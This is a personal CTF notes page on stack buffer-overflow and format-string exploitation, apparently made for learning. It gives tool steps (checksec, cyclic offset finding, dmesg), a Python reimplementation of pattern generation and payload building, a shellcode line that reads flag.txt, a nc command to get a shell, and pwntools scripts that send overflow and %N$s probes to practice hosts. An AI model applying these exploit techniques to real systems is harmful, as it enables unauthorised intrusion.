Prabesh Sapkota

Challenges

https://drive.google.com/file/d/1xt4hEbcnN77rdxXPtbHXNDGdR0ZGPRzW/view?usp=sharing

Buffer Overflow

  • Check file info: file pwnme

  • Check strings: strings pwnme

  • Use checksec, ltrace and strace

  • Try Ghidra or IDA to decompile: start from main and follow the strings

    int main(int ac, char** av)

  • Try readelf -s (grep -i "Func" to filter for functions)

  • Get a segmentation fault and check the faulting address: sudo dmesg | tail

  • Use the pwn tool: pwn cyclic <length> generates a pattern; feed it with echo "output" | ./file, then pwn cyclic -l 0x<value> (the value from dmesg) gives the offset

    To get the packed hex value of an address: pwn.p32(address)

  • Try to get a segmentation fault (buffer overflow with something like python -c "print 'A'*100 + 'BB'" | ./file) and observe dmesg | tail

  • To loop this process: for i in {20..28}; do echo $i; python -c "print 'A'*$i+'hexvalue'" | ./file ; done

  • To get a shell: (python -c "print 'A'*20 + 'hexvalue'"; cat) | nc pwn.file.com 1337

  • To get the flag directly: import pwn, then pwn.asm(pwn.shellcraft.i386.linux.cat('flag.txt'))

    python -c "print 'output'" | ./file

  • Find the offset at which the buffer reaches the saved return address, then replace BB with the hex value obtained
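The pattern-and-offset steps above (pwn cyclic, pwn cyclic -l, reading the address out of dmesg, pwn.p32) reimplemented in plain Python as an added example, so you can see what those tools compute. This is not the page author's code and does not need pwntools: the de Bruijn generator matches pwntools' default alphabet and window size, the dmesg line is constructed (modelled on the kernel's x86 segfault message), and the target address in the usage block is a placeholder. cyclic_find returns -1 when the crashing value is not part of the pattern, which is the check that tells you the fault is not yet your overwritten return address.

```python
import itertools
import re
import struct

ALPHABET = b'abcdefghijklmnopqrstuvwxyz'   # same default alphabet as pwntools


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield a de Bruijn sequence B(k, n): every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """Equivalent of `pwn cyclic <length>`: the first `length` bytes of the pattern."""
    return bytes(itertools.islice(de_bruijn(n=n), length))


def cyclic_find(value, n=4, max_length=0x10000):
    """Equivalent of `pwn cyclic -l <value>`: offset of `value` inside the pattern.

    `value` may be the raw 4 bytes or the little-endian integer that dmesg/gdb show.
    Returns -1 if the value is not part of the pattern (the crash is not our overwrite).
    """
    if isinstance(value, int):
        value = value.to_bytes(n, 'little')
    return cyclic(max_length, n).find(value)


def p32(addr):
    """Equivalent of pwn.p32: pack a 32-bit address little-endian."""
    return struct.pack('<I', addr)


# Constructed sample of a dmesg segfault line (not from a real run): EIP holds
# four pattern bytes, shown as the little-endian integer 0x6161616b ("kaaa").
SAMPLE_DMESG = (
    '[ 1234.567890] pwnme[4321]: segfault at 6161616b ip 000000006161616b '
    'sp 00000000ffffd3a0 error 14 in pwnme[56555000+1000]'
)

FAULT_RE = re.compile(r'segfault at [0-9a-f]+ ip ([0-9a-f]+)')


def parse_fault_ip(dmesg_line):
    """Pull the faulting instruction pointer out of a dmesg segfault line."""
    m = FAULT_RE.search(dmesg_line)
    return int(m.group(1), 16) if m else None


def build_payload(offset, ret_addr):
    """Padding up to the saved return address, then the packed target address."""
    return b'A' * offset + p32(ret_addr)


if __name__ == '__main__':
    print(cyclic(100))                               # b'aaaabaaacaaad...'
    ip = parse_fault_ip(SAMPLE_DMESG)
    offset = cyclic_find(ip)
    print(f'EIP=0x{ip:08x} -> offset {offset}')      # offset 40
    print(build_payload(offset, 0x08048576))         # placeholder target address
```

Piping cyclic(100) into the binary instead of 'A'*100 means one crash is enough to learn the offset: the value in EIP is unique to one position in the pattern, so the for-loop over candidate lengths in the notes above becomes unnecessary.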

Automation

#!/usr/bin/env python3
from pwn import *

context.log_level = 'critical'   # silence pwntools progress output

s = remote('file.ctf.org', 1337)
print(s.recv())

# send the same line eight times, then the modified line, then 'F' to finish
for i in range(8):
    s.sendline(b'A anything')

s.sendline(b'A ' + b'2' * 8)
s.sendline(b'F')

print(s.recv())
print(s.recv())
s.close()

A slightly modified one (probes stack positions with a %N$s format string, one connection per position):

#!/usr/bin/env python3
from pwn import *

host, port = 'file.ctf.org', 1337

for i in range(10):
    s = remote(host, port)
    s.recvuntil(b'>')
    s.sendline(('%' + str(i) + '$s').encode())
    response = s.recv()
    if b'dumped core' in response:
        print("segfault")
    else:
        print(response)
    s.close()
